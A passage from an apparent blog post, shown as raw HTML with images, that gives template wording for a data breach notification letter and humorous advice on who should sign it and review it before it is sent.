<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wQTVgSAdiA7RZY44cctNz3-5COQiKddF5S9uzfwAdRQXdPR3KiIlAJVQhGqy-u_k3FqUcTNJxYhDRJg9HrnCYsVvYqoZfsYnQrq10BAQyCxwNEwGHrwvvsKJfdiUGcSy2ivxZP64n9Ft/s1600/gangsigns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wQTVgSAdiA7RZY44cctNz3-5COQiKddF5S9uzfwAdRQXdPR3KiIlAJVQhGqy-u_k3FqUcTNJxYhDRJg9HrnCYsVvYqoZfsYnQrq10BAQyCxwNEwGHrwvvsKJfdiUGcSy2ivxZP64n9Ft/s640/gangsigns.png" width="640" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><i>“You may wish to place a fraud alert or freeze on your credit report, which you can do by contacting the three major credit reporting bureaus, Equifax, Experian, and TransUnion [insert contact info here]. Be aware that you will not be able to borrow money or open a new credit card until you lift the freeze.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“If your bank has not contacted you about replacing your cards, you may wish to proactively call them and ask for a replacement card.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We recommend following industry standards and best practices when it comes to cyber security. The attached document details steps you can take to better protect yourself from online threats, both professionally and personally. There is even a section included that focuses on online safety for kids and teens.”</i> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part IV—We are Here to Help You: This is where you point people to your public relations team, who in turn can run point between the employees/clients/partners and the legal team, technical team, management team, etc… </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvjmmE4h43uI-sL2jMSc46U0OqlD_NNRArTXXMaFQz3mVzHSXb7ThI1zR0H-YkfLGvH1xL9MU0LMKbmqTHYPUAk2f15TCHVBiaja1sq6XfrxmAl28W4OX5010OpeggZQpPK5DQt_g2Qd2/s1600/callz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvjmmE4h43uI-sL2jMSc46U0OqlD_NNRArTXXMaFQz3mVzHSXb7ThI1zR0H-YkfLGvH1xL9MU0LMKbmqTHYPUAk2f15TCHVBiaja1sq6XfrxmAl28W4OX5010OpeggZQpPK5DQt_g2Qd2/s640/callz.png" width="640" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">What? You don’t have a public relations team/person? Didn’t anyone tell you that this is a key part of a data breach incident? This is one of those indirect costs of data breaches that no one ever considers during the risk management process. Yes, it will cost money; you didn’t think data breaches were cheap did you? Please note the inclusion of a <u>toll-free number</u> and the promise of regular updates. We define “regular” as at least every two weeks. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“If you have any questions or concerns, you may contact our offices at: [1-800-555-5555] or email us at [company@ourcompany.com]. Our website: [www.ourcompany.com] will be updated with the latest information as our investigation continues.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“Again, we apologize for this incident and any inconvenience this causes. We value your trust and we are committing all resources to resolving this incident quickly and completely, so we can get back to [insert mission statement or “what you do” here].</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>Sincerely,</i></span><br />
<span style="font-size: large;"><i>[Highest ranking person in your company]</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;">No, I’m not kidding. Your lawyer should not sign this for you. Nor should your 3rd party data breach management company. Not your PR firm, not the head of IT, and definitely not something cutesy like your mascot (even if your mascot is one of the cats in this blog post). And for crying out loud, I don’t care how big and high profile you are, don’t have the President of the United States address the nation for you either. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Before you send out this letter, run it by your public relations team/person, your general counsel/lawyer, your data breach response team, and your CEO, who as we discussed above <u>will be signing the letter</u>. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU75g2UISo2nZnLwiGZK0c4lzxQWm4NERk8OpYSS5BH8OjC7XD_fgAZxlkj4W0z-6RHG-sWO5K62kP2iGB42_MfY8qilDJP6LUZfh_50KRNzUFTHf4voYSj1_PnufhKYM-fbGZMNNUA42C/s1600/CEOKitteh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU75g2UISo2nZnLwiGZK0c4lzxQWm4NERk8OpYSS5BH8OjC7XD_fgAZxlkj4W0z-6RHG-sWO5K62kP2iGB42_MfY8qilDJP6LUZfh_50KRNzUFTHf4voYSj1_PnufhKYM-fbGZMNNUA42C/s400/CEOKitteh.png" width="352" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0